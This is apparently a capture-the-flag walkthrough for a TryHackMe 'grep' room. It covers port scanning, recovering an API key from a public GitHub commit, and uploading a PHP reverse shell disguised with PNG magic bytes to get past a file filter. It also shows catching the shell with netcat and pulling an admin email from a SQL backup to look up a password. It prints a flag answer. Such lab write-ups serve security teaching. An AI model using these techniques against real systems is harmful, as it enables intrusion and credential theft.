A challenge that tests your reconnaissance and OSINT skills.
scan the target
nmap -sS -sV -T4 -p-
3 open web servers (80,443,51337)
let's check the webapp, it seem nothing on port 80
and port 443 got error
refer to previous nmap report, i need to add domain grep.thm to hosts file
echo " grep.thm" >> /etc/hosts
okay, here you are
as the hint, the website is developed by SuperSecure Corp, and it's under developed
after a bit research i find it on Github with "SearchME" AND "This website is under development"
exactly what we need, only 4 commits and it's also a new project
i found some endpoints here
i tried to register an account but it need an API key
i can easily get key via a commit "remove key"
open burpsuite, catch request, change X-THM-API-Key to our key
after login, we got the first flag
Flag | First flag |
Answer | THM{4ec9806d7e1350270dc402ba870ccebb} |
another endpoint is upload.php allowed us upload images to /uploads
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
remember, webserver filter file by 2 things: extensions and magic bytes
so, we need to change both extension and some magic bytes
mv php-reverse-shell.php reverse.png.php
vi reverse.png.php
padding some characters at the beginning of file
change the padding hex to png magic bytes
hexedit reverse.png.php
89 50 4e 47
xxd reverse.png.php | head
file uploaded successfully
nc -vlnp 1234
go to https://grep.thm/api/uploads/ and click to our file
we got our shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
i checked nothing at home folders, but in our /var/www, i see 2 interesting folder
we only have permission on user.sql maybe contain admin's email
cd backup
grep admin user.sql
backto leakchecker and a lot of certificate in web folder, i think it related to a domain
echo " leakchecker.grep.thm" >> /etc/hosts
here, you can find it in port 51337 from previous nmap scan
just enter admin's email to get password
Flag | user.txt |
Answer |